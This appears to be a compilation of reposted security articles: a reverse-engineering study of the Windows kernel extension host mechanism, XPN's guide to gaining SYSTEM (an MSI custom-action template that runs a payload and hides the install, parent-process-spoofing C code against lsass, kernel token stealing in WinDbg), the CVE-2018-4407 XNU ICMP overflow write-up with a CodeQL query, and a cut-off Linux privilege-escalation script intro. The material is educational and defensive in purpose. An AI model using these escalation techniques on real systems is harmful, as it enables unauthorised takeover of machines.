Yes, More Callbacks — The Kernel Extension Mechanism

Original text by Yarden Shafir

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00rudocumented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run for example “!wdbgark.wa_systemcb /type process“ in WinDbg, we’ll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallbackand search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo

    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the amount of functions supplied in RegistrationInfo->FunctionCount matches the expected amount set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY(unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRYstructure is undocumented, and looks something like this:
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the extension 
// contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface; // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before
// and after an extension for this
// host is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable; // a table of the callbacks that the 
// driver “registers”
    DWORD Flags;         // Only uses one bit. 
// Not sure about its meaning.
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS in certain occasions, which makes them some kind of callbacks.

Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which contains a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid-out in the exact order presented here, since they are called according to their index. As we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know 🙂

Appendix A — Extension hosts initialized by NTOS:

Appendix B — functions pseudo-code:

NTSTATUS ExRegisterExtension(_Outptr_ PEX_EXTENSION *Extension, _In_ ULONG RegistrationVersion, _In_ PREGISTRATION_INFO RegistrationInfo)
	// Validate that version is ok and that FunctionTable is not sent without FunctionCount or vise-versa.
	if ( (RegistrationVersion & 0xFFFF0000 != 0x10000) || (RegistrationInfo->FunctionTable == nullptr && RegistrationInfo->FunctionCount != 0) ) 

	// Skipping over some lock-related stuff,
	// Find the host with the matching version and id.
	pHostListEntry = ExpFindHost(RegistrationInfo->ExtensionId, RegistrationInfo->ExtensionVersion);

	// More lock-related stuff.	

	if (!pHostListEntry)

	// Verify that the FunctionCount in the host doesn't exceed the FunctionCount supplied by the caller.
	if (RegistrationInfo->FunctionCount < pHostListEntry->FunctionCount)

	// Check that the number of functions in FunctionTable matches the amount in FunctionCount.
	PVOID FunctionTable = RegistrationInfo->FunctionTable;
	for (int i = 0; i < RegistrationInfo->FunctionCount; i++)
		if ( RegistrationInfo->FunctionTable[i] == nullptr ) 

	// skipping over some more lock-related stuff

	// Check if there is already an extension registered for this host.
	if (pHostListEntry->FunctionTable != nullptr || FlagOn(pHostListEntry->Flags, 1) )
		// There is something related to locks here

	// If there is a callback function for this host, call it before registering the extension, with 0 as the first parameter.
	if (pHostListEntry->FunctionAddress) 
		pHostListEntry->FunctionAddress(0, pHostListEntry->ArgForFunction); 

	// Set the FunctionTable in the host to the table supplied by the caller, or to MmBadPointer if a table wasn't supplied.
	if (RegistrationInfo->FunctionTable == nullptr)
		pHostListEntry->FunctionTable = nt!MmBadPointer;
		pHostListEntry->FunctionTable = RegistrationInfo->FunctionTable;

	pHostListEntry->RundownRef = 0;

	// If there is a callback function for this host, call it after registering the extension, with 1 as the first parameter.
	if (pHostListEntry->FunctionAddress)
		pHostListEntry->FunctionAddress(1, pHostListEntry->ArgForFunction);

	// Here there is some more lock-related stuff

	// Set the HostTable of the calling driver to the table of functions listed in the host.
	if (RegistrationInfo->HostTable != nullptr)
		*(PVOID)RegistrationInfo->HostTable = pHostListEntry->hostInterface;

	// Return the initialized host to the caller in the output Extension parameter.
	*Extension = pHostListEntry;

ExRegisterExtension.c hosted with ❤ by GitHub

NTSTATUS ExRegisterHost(_Out_ PHOST_LIST_ENTRY ExtensionHost, _In_ ULONG Unused, _In_ PHOST_INFORMATION HostInformation)

	// Allocate memory for a new HOST_LIST_ENTRY
	PHOST_LIST_ENTRY p = ExAllocatePoolWithTag(HostInformation->PoolType, 0x60, 'HExE');
	if (p == nullptr)

	// Initialize a new HOST_LIST_ENTRY 
	p->Flags &= 0xFE;
	p->RefCount = 1;
	p->FunctionTable = 0;
	p->ExtensionId = HostInformation->ExtensionId;
	p->ExtensionVersion = HostInformation->ExtensionVersion;
	p->hostInterface = HostInformation->hostInterface;
	p->FunctionAddress = HostInformation->FunctionAddress;
	p->ArgForFunction = HostInformation->ArgForFunction;			
	p->Lock = 0; 			
	p->RundownRef = 0;		

	// Search for an existing listEntry with the same version and id.
	PHOST_LIST_ENTRY listEntry = ExpFindHost(HostInformation->ExtensionId, HostInformation->ExtensionVersion);
	if (listEntry)
		// Insert the new HOST_LIST_ENTRY to the end of ExpHostList.
		if ( *lastHostListEntry != &firstHostListEntry )

		firstHostListEntry->Prev = &p;
		p->Next = firstHostListEntry;
		lastHostListEntry = p;

		ExtensionHost = p;
	return Status;

ExRegisterHost.c hosted with ❤ by GitHub

PHOST_LIST_ENTRY ExpFindHost(USHORT ExtensionId, USHORT ExtensionVersion)
	for (entry == ExpHostList; ; entry = entry->Next)
		if (entry == &ExpHostList) 
			return 0; 
		if ( *(entry->ExtensionId) == ExtensionId && *(entry->ExtensionVersion) == ExtensionVersion ) 
	return entry;

ExpFindHost.c hosted with ❤ by GitHub

void ExpDereferenceHost(PHOST_LIST_ENTRY Host)
  	if ( InterlockedExchangeAdd(Host.RefCount, 0xFFFFFFFF) == 1 )
    		ExFreePoolWithTag(Host, 0);

ExpDereferenceHost.c hosted with ❤ by GitHub

Appendix C — structures definitions:

    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;

    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the 
// extension contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface;  // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before and
// after an extension for this host
// is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that 
// the driver “registers”
DWORD Flags;                // Only uses one flag. 
// Not sure about its meaning.

    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;

Alternative methods of becoming SYSTEM

( Original text by XPN )

For many pentesters, Meterpreter’s getsystem command has become the default method of gaining SYSTEM account privileges, but have you ever have wondered just how this works behind the scenes?

In this post I will show the details of how this technique works, and explore a couple of methods which are not quite as popular, but may help evade detection on those tricky redteam engagements.

Meterpreter’s «getsystem»

Most of you will have used the getsystem module in Meterpreter before. For those that haven’t, getsystem is a module offered by the Metasploit-Framework which allows an administrative account to escalate to the local SYSTEM account, usually from local Administrator.

Before continuing we first need to understand a little on how a process can impersonate another user. Impersonation is a useful method provided by Windows in which a process can impersonate another user’s security context. For example, if a process acting as a FTP server allows a user to authenticate and only wants to allow access to files owned by a particular user, the process can impersonate that user account and allow Windows to enforce security.

To facilitate impersonation, Windows exposes numerous native API’s to developers, for example:

  • ImpersonateNamedPipeClient
  • ImpersonateLoggedOnUser
  • ReturnToSelf
  • LogonUser
  • OpenProcessToken

Of these, the ImpersonateNamedPipeClient API call is key to the getsystem module’s functionality, and takes credit for how it achieves its privilege escalation. This API call allows a process to impersonate the access token of another process which connects to a named pipe and performs a write of data to that pipe (that last requirement is important ;). For example, if a process belonging to «victim» connects and writes to a named pipe belonging to «attacker», the attacker can call ImpersonateNamedPipeClient to retrieve an impersonation token belonging to «victim», and therefore impersonate this user. Obviously, this opens up a huge security hole, and for this reason a process must hold the SeImpersonatePrivilege privilege.

This privilege is by default only available to a number of high privileged users:


This does however mean that a local Administrator account can use ImpersonateNamedPipeClient, which is exactly how getsystem works:

  1. getsystem creates a new Windows service, set to run as SYSTEM, which when started connects to a named pipe.
  2. getsystem spawns a process, which creates a named pipe and awaits a connection from the service.
  3. The Windows service is started, causing a connection to be made to the named pipe.
  4. The process receives the connection, and calls ImpersonateNamedPipeClient, resulting in an impersonation token being created for the SYSTEM user.

All that is left to do is to spawn cmd.exe with the newly gathered SYSTEM impersonation token, and we have a SYSTEM privileged process.

To show how this can be achieved outside of the Meterpreter-Framework, I’ve previously released a simple tool which will spawn a SYSTEM shell when executed. This tool follows the same steps as above, and can be found on my github account here.

To see how this works when executed, a demo can be found below:

Now that we have an idea just how getsystem works, let’s look at a few alternative methods which can allow you to grab SYSTEM.

MSIExec method

For anyone unlucky enough to follow me on Twitter, you may have seen my recent tweet about using a .MSI package to spawn a SYSTEM process:

Adam Chester@_xpn_

There is something nice about embedding a Powershell one-liner in a .MSI, nice alternative way to execute as SYSTEM 🙂

This came about after a bit of research into the DOQU 2.0 malware I was doing, in which this APT actor was delivering malware packaged within a MSI file.

It turns out that a benefit of launching your code via an MSI are the SYSTEM privileges that you gain during the install process. To understand how this works, we need to look at WIX Toolset, which is an open source project used to create MSI files from XML build scripts.

The WIX Framework is made up of several tools, but the two that we will focus on are:

  • candle.exe — Takes a .WIX XML file and outputs a .WIXOBJ
  • light.exe — Takes a .WIXOBJ and creates a .MSI

Reviewing the documentation for WIX, we see that custom actions are provided, which give the developer a way to launch scripts and processes during the install process. Within the CustomAction documentation, we see something interesting:


This documents a simple way in which a MSI can be used to launch processes as SYSTEM, by providing a custom action with an Impersonate attribute set to false.

When crafted, our WIX file will look like this:

<?xml version=«1.0«?>
<Wix xmlns=««>
<Product Id=«*« UpgradeCode=«12345678-1234-1234-1234-111111111111« Name=«Example Product Name« Version=«0.0.1« Manufacturer=«@_xpn_« Language=«1033«>
<Package InstallerVersion=«200« Compressed=«yes« Comments=«Windows Installer Package«/>
<Media Id=«1« Cabinet=«« EmbedCab=«yes«/>
<Directory Id=«TARGETDIR« Name=«SourceDir«>
<Directory Id=«ProgramFilesFolder«>
<Directory Id=«INSTALLLOCATION« Name=«Example«>
<Component Id=«ApplicationFiles« Guid=«12345678-1234-1234-1234-222222222222«>
<File Id=«ApplicationFile1« Source=«example.exe«/>
<Feature Id=«DefaultFeature« Level=«1«>
<ComponentRef Id=«ApplicationFiles«/>
<CustomAction Id=«SystemShell« Execute=«deferred« Directory=«TARGETDIR« ExeCommand=[cmdline] Return=«ignore« Impersonate=«no«/>
<CustomAction Id=«FailInstall« Execute=«deferred« Script=«vbscript« Return=«check«>
invalid vbs to fail install
<Custom Action=«SystemShell« After=«InstallInitialize«></Custom>
<Custom Action=«FailInstall« Before=«InstallFiles«></Custom>
view rawmsigen.wix hosted with ❤ by GitHub

A lot of this is just boilerplate to generate a MSI, however the parts to note are our custom actions:

<Property Id="cmdline">powershell...</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

This custom action is responsible for executing our provided cmdline as SYSTEM (note the Property tag, which is a nice way to get around the length limitation of the ExeCommandattribute for long Powershell commands).

Another trick which is useful is to ensure that the install fails after our command is executed, which will stop the installer from adding a new entry to «Add or Remove Programs» which is shown here by executing invalid VBScript:

<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
  invalid vbs to fail install

Finally, we have our InstallExecuteSequence tag, which is responsible for executing our custom actions in order:

  <Custom Action="SystemShell" After="InstallInitialize"></Custom>
  <Custom Action="FailInstall" Before="InstallFiles"></Custom>

So, when executed:

  1. Our first custom action will be launched, forcing our payload to run as the SYSTEM account.
  2. Our second custom action will be launched, causing some invalid VBScript to be executed and stop the install process with an error.

To compile this into a MSI we save the above contents as a file called «msigen.wix», and use the following commands:

candle.exe msigen.wix
light.exe msigen.wixobj

Finally, execute the MSI file to execute our payload as SYSTEM:



This method of becoming SYSTEM was actually revealed to me via a post from James Forshaw’s walkthrough of how to become «Trusted Installer».

Again, if you listen to my ramblings on Twitter, I recently mentioned this technique a few weeks back:

How this technique works is by leveraging the CreateProcess Win32 API call, and using its support for assigning the parent of a newly spawned process via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.

If we review the documentation of this setting, we see the following:


So, this means if we set the parent process of our newly spawned process, we will inherit the process token. This gives us a cool way to grab the SYSTEM account via the process token.

We can create a new process and set the parent with the following code:

int pid;
HANDLE pHandle = NULL;
SIZE_T size;
BOOL ret;

// Set the PID to a SYSTEM process PID
pid = 555;


// Open the process which we will inherit the handle from
if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) {
	printf("Error opening PID %d\n", pid);
	return 2;

ZeroMemory(&si, sizeof(STARTUPINFOEXA));

InitializeProcThreadAttributeList(NULL, 1, 0, &size);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL);

si.StartupInfo.cb = sizeof(STARTUPINFOEXA);

// Finally, create the process
ret = CreateProcessA(

if (ret == false) {
	printf("Error creating new process (%d)\n", GetLastError());
	return 3;

When compiled, we see that we can launch a process and inherit an access token from a parent process running as SYSTEM such as lsass.exe:


The source for this technique can be found here.

Alternatively, NtObjectManager provides a nice easy way to achieve this using Powershell:

New-Win32Process cmd.exe -CreationFlags Newconsole -ParentProcess (Get-NtProcess -Name lsass.exe)

Bonus Round: Getting SYSTEM via the Kernel

OK, so this technique is just a bit of fun, and not something that you are likely to come across in an engagement… but it goes some way to show just how Windows is actually managing process tokens.

Often you will see Windows kernel privilege escalation exploits tamper with a process structure in the kernel address space, with the aim of updating a process token. For example, in the popular MS15-010 privilege escalation exploit (found on exploit-db here), we can see a number of references to manipulating access tokens.

For this analysis, we will be using WinDBG on a Windows 7 x64 virtual machine in which we will be looking to elevate the privileges of our cmd.exe process to SYSTEM by manipulating kernel structures. (I won’t go through how to set up the Kernel debugger connection as this is covered in multiple places for multiple hypervisors.)

Once you have WinDBG connected, we first need to gather information on our running process which we want to elevate to SYSTEM. This can be done using the !process command:

!process 0 0 cmd.exe

Returned we can see some important information about our process, such as the number of open handles, and the process environment block address:

PROCESS fffffa8002edd580
    SessionId: 1  Cid: 0858    Peb: 7fffffd4000  ParentCid: 0578
    DirBase: 09d37000  ObjectTable: fffff8a0012b8ca0  HandleCount:  21.
    Image: cmd.exe

For our purpose, we are interested in the provided PROCESS address (in this example fffffa8002edd580), which is actually a pointer to an EPROCESS structure. The EPROCESSstructure (documented by Microsoft here) holds important information about a process, such as the process ID and references to the process threads.

Amongst the many fields in this structure is a pointer to the process’s access token, defined in a TOKEN structure. To view the contents of the token, we first must calculate the TOKEN address. On Windows 7 x64, the process TOKEN is located at offset 0x208, which differs throughout each version (and potentially service pack) of Windows. We can retrieve the pointer with the following command:

kd> dq fffffa8002edd580+0x208 L1

This returns the token address as follows:

fffffa80`02edd788  fffff8a0`00d76c51

As the token address is referenced within a EX_FAST_REF structure, we must AND the value to gain the true pointer address:

kd> ? fffff8a0`00d76c51 & ffffffff`fffffff0

Evaluate expression: -8108884136880 = fffff8a0`00d76c50

Which means that our true TOKEN address for cmd.exe is at fffff8a000d76c50. Next we can dump out the TOKEN structure members for our process using the following command:

kd> !token fffff8a0`00d76c50

This gives us an idea of the information held by the process token:

User: S-1-5-21-3262056927-4167910718-262487826-1001
User Groups:
 00 S-1-5-21-3262056927-4167910718-262487826-513
    Attributes - Mandatory Default Enabled
 01 S-1-1-0
    Attributes - Mandatory Default Enabled
 02 S-1-5-32-544
    Attributes - DenyOnly
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled
 04 S-1-5-4
    Attributes - Mandatory Default Enabled
 05 S-1-2-1
    Attributes - Mandatory Default Enabled
 06 S-1-5-11
    Attributes - Mandatory Default Enabled
 07 S-1-5-15
    Attributes - Mandatory Default Enabled
 08 S-1-5-5-0-2917477
    Attributes - Mandatory Default Enabled LogonId
 09 S-1-2-0
    Attributes - Mandatory Default Enabled
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled
 11 S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-21-3262056927-4167910718-262487826-513
 19 0x000000013 SeShutdownPrivilege               Attributes -
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
 25 0x000000019 SeUndockPrivilege                 Attributes -
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
 34 0x000000022 SeTimeZonePrivilege               Attributes -

So how do we escalate our process to gain SYSTEM access? Well we just steal the token from another SYSTEM privileged process, such as lsass.exe, and splice this into our cmd.exe EPROCESS using the following:

kd> !process 0 0 lsass.exe
kd> !process 0 0 cmd.exe

To see what this looks like when run against a live system, I’ll leave you with a quick demo showing cmd.exe being elevated from a low level user, to SYSTEM privileges:

Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)

( Original text )

This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

  • Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
  • Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
  • Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
  • Apple OS X El Capitan and earlier: all devices

I reported the vulnerability in time for Apple to patch the vulnerability for iOS 12 (released on September 17) and macOS Mojave (released on September 24). Both patches were announced retrospectively on October 30.

Severity and Mitigation

The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device’s IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee® Endpoint Security for Mac and it made no difference. It also doesn’t matter what software you are running on the device — the malicious packet will still trigger the vulnerability even if you don’t have any ports open.

Since an attacker can control the size and content of the heap buffer overflow, it may be possible for them to exploit this vulnerability to gain remote code execution on your device. I have not attempted to write an exploit which is capable of doing this. My exploit PoC just overwrites the heap with garbage, which causes an immediate kernel crash and device reboot.

I am only aware of two mitigations against this vulnerability:

  1. Enabling stealth mode in the macOS firewall prevents the attack from working. Kudos to my colleague Henti Smith for discovering this, because this is an obscure system setting which is not enabled by default. As far as I’m aware, stealth mode does not exist on iOS devices.
  2. Do not use public WiFi networks. The attacker needs to be on the same network as the target device. It is not usually possible to send the malicious packet across the internet. For example, I wrote a fake web server which sends back a malicious reply when the target device tries to load a webpage. In my experiments, the malicious packet never arrived, except when the web server was on the same network as the target device.

Proof-of-concept exploit

I have written a proof-of-concept exploit which triggers the vulnerability. To give Apple’s users time to upgrade, I will not publish the source code for the exploit PoC immediately. However, I have made a short video which shows the PoC in action, crashing all the Apple devices on the local network.

The vulnerability

The bug is a buffer overflow in this line of code (bsd/netinet/ip_icmp.c:339):

m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);

This code is in the function icmp_error. According to the comment, the purpose of this function is to «Generate an error packet of type error in response to bad packet ip». It uses the ICMP protocol to send out the error message. The header of the packet that caused the error is included in the ICMP message, so the purpose of the call to m_copydata on line 339 is to copy the header of the bad packet into the ICMP message. The problem is that the header might be too big for the destination buffer. The destination buffer is an mbufmbuf is a datatype which is used to store both incoming and outgoing network packets. In this code, n is an incoming packet (containing untrusted data) and m is an outgoing ICMP packet. As we will see shortly, icp is a pointer into mm is allocated on line 294 or line 296:

if (MHLEN > (sizeof(struct ip) + ICMP_MINLEN + icmplen))
  m = m_gethdr(M_DONTWAIT, MT_HEADER);  /* MAC-OK */
  m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR);

Slightly further down, on line 314mtod is used to get m‘s data pointer:

icp = mtod(m, struct icmp *);

mtod is just macro, so this line of code does not check that the mbuf is large enough to hold an icmp struct. Furthermore, the data is not copied to icp, but to &icp->icmp_ip, which is at an offset of +8 bytes from icp.

I do not have the necessary tools to be able to step through the XNU kernel in a debugger, so I am actually a little unsure about the exact allocation size of the mbuf. Based on what I see in the source code, I think that m_gethdr creates an mbuf that can hold 88 bytes, but I am less sure about m_getcl. Based on practical experiments, I have found that a buffer overflow is triggered when icmplen >= 84.

At this time, I will not say any more about how the exploit works. I want to give Apple users a chance to upgrade their devices first. However, in the relatively near future I will publish the source code for the exploit PoC in our SecurityExploits repository.

Finding the vulnerability with QL

I found this vulnerability by doing variant analysis on the bug that caused the buffer overflow vulnerability in the packet-mangler. That vulnerability was caused by a call to mbuf_copydata with a user-controlled size argument. So I wrote a simple query to look for similar bugs:

 * @name mbuf copydata with tainted size
 * @description Calling m_copydata with an untrusted size argument
 *              could cause a buffer overflow.
 * @kind path-problem
 * @problem.severity warning
 * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size

import cpp
import semmle.code.cpp.dataflow.TaintTracking
import DataFlow::PathGraph

class Config extends TaintTracking::Configuration {
  Config() { this = "tcphdr_flow" }

  override predicate isSource(DataFlow::Node source) {
    source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod"

  override predicate isSink(DataFlow::Node sink) {
    exists (FunctionCall call
    | call.getArgument(2) = sink.asExpr() and

from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "m_copydata with tainted size."

This is a simple taint-tracking query which looks for dataflow from m_mtod to the size of argument of a «copydata» function. The function named m_mtod returns the data pointer of an mbuf, so it is quite likely that it will return untrusted data. It is what the mtod macro expands to. Obviously m_mtod is just one of many sources of untrusted data in the XNU kernel, but I have not included any other sources to keep the query as simple as possible. This query returns 9 results, the first of which is the vulnerability in icmp_error. I believe the other 8 results are false positives, but the code is sufficiently complicated that I do consider them to be bad query results.

Try QL on XNU

Unlike most other open source projects, XNU is not available to query on LGTM. This is because LGTM uses Linux workers to build projects, but XNU can only be built on a Mac. Even on a Mac, XNU is highly non-trivial to build. I would not have been able to do it if I had not found this incredibly useful blog post by Jeremy Andrus. Using Jeremy Andrus’s instructions and scripts, I have manually built snapshots for the three most recent published versions of XNU. You can download the snapshots from these links: 10.13.410.13.510.13.6. Unfortunately, Apple have not yet released the source code for 10.14 (Mojave / iOS 12), so I cannot create a QL snapshot for running queries against it yet. To run queries on these QL snapshots, you will need to download QL for Eclipse. Instructions on how to use QL for Eclipse can be found here.


  • 2018-08-09: Privately disclosed to Proof-of-concept exploit included.
  • 2018-08-09: Report acknowledged by
  • 2018-08-20: asked me to send them the exact macOS version number and a panic log.
  • 2018-08-20: Returned the requested information to Also sent them a slightly improved version of the exploit PoC.
  • 2018-08-22: confirmed that the issue is fixed in the betas of macOS Mojave and iOS 12. However, they also said that they are «investigating addressing this issue on additional platforms» and that they will not disclose the issue until November 2018.
  • 2018-09-17: iOS 12 released by Apple. The vulnerability was fixed.
  • 2018-09-24: macOS Mojave released by Apple. The vulnerability was fixed.
  • 2018-10-30: Vulnerabilities disclosed.

"Send it back"


  • «I am Error». Screenshot from Zelda II: The Adventure of Link. The screenshot copyright is believed to belong to Nintendo. Image downloaded from wikipedia.
  • «Send it back». By Edward Backhouse.

Linux Privilege Escalation via Automated Script

Картинки по запросу Linux Privilege Escalation

( Original text by Raj Chandel )

We all know that, after compromising the victim’s machine we have a low-privileges shell that we want to escalate into a higher-privileged shell and this process is known as Privilege Escalation. Today in this article we will discuss what comes under privilege escalation and how an attacker can identify that low-privileges shell can be escalated to higher-privileged shell. But apart from it, there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. This is generally aimed at enumeration rather than specific vulnerabilities/exploits. This type of script could save your much time.

Table of Content

  • Introduction
  • Vectors of Privilege Escalation
  • LinuEnum
  • Linuxprivchecker
  • Linux Exploit Suggester 2
  • Bashark
  • BeRoot


Basically privilege escalation is a phase that comes after the attacker has compromised the victim’s machine where he try to gather critical information related to system such as hidden password and weak configured services or applications and etc. All these information helps the attacker to make the post exploit against machine for getting higher-privileged shell.

Vectors of Privilege Escalation

  • OS Detail & Kernel Version
  • Any Vulnerable package installed or running
  • Files and Folders with Full Control or Modify Access
  • File with SUID Permissions
  • Mapped Drives (NFS)
  • Potentially Interesting Files
  • Environment Variable Path
  • Network Information (interfaces, arp, netstat)
  • Running Processes
  • Cronjobs
  • User’s Sudo Right
  • Wildcard Injection

There are several script use in Penetration testing for quickly identify potential privilege escalation vectors on Windows systems and today we are going to elaborate each script which is working smoothly.


